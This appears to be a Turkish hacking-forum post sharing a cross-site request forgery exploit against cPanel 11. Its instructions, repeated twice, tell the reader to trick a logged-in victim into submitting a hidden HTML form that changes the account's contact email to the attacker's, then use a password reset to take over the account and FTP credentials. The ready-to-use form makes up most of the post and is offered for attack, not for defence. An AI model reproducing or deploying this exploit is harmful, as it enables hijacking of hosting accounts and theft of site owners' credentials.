CPanel 11 CSRF Bug
x@mail.com yerini kendi mailinizle değiştirip hedef sitenin yerini felan ayarlıyorsunuz kendinize göre sonra bunu kurbana tıklatıyorsunuz ve cpanelin kayıtlı olduğu mail yeri sizin mailinizle değişiyor daha sonra parola sıfırlama atıyorsunuz ve ftp şifresini alıyorsunuz.
[hide]
[/hide]
x@mail.com yerini kendi mailinizle değiştirip hedef sitenin yerini felan ayarlıyorsunuz kendinize göre sonra bunu kurbana tıklatıyorsunuz ve cpanelin kayıtlı olduğu mail yeri sizin mailinizle değişiyor daha sonra parola sıfırlama atıyorsunuz ve ftp şifresini alıyorsunuz.
[hide]
PHP:
<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"
action="http://www.google.com:2082/frontend/x3/contact/saveemail.html">
<input id="email" name="email" type="hidden" value="x@mail.com">
<input id="second_email" name="second_email" type="hidden" value="">
<input id="notify_disk_limit" name="notify_disk_limit" type="hidden" value="1">
<input id="notify_bandwidth_limit" name="notify_bandwidth_limit" type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">
<input type="submit" class="input-button" value="Save">
</form>